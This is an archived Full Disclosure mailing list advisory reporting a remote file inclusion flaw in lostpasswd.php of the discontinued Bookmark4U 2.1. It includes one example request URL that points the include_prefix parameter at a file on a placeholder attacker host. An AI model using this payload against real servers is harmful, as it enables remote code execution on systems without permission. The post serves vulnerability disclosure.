Full Disclosure mailing list archives
Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI
From: BugsNotHugs <bugsnothugs () gmail com>
Date: Mon, 02 Jul 2012 01:01:33 -0600
vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt??? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI BugsNotHugs (Jul 02)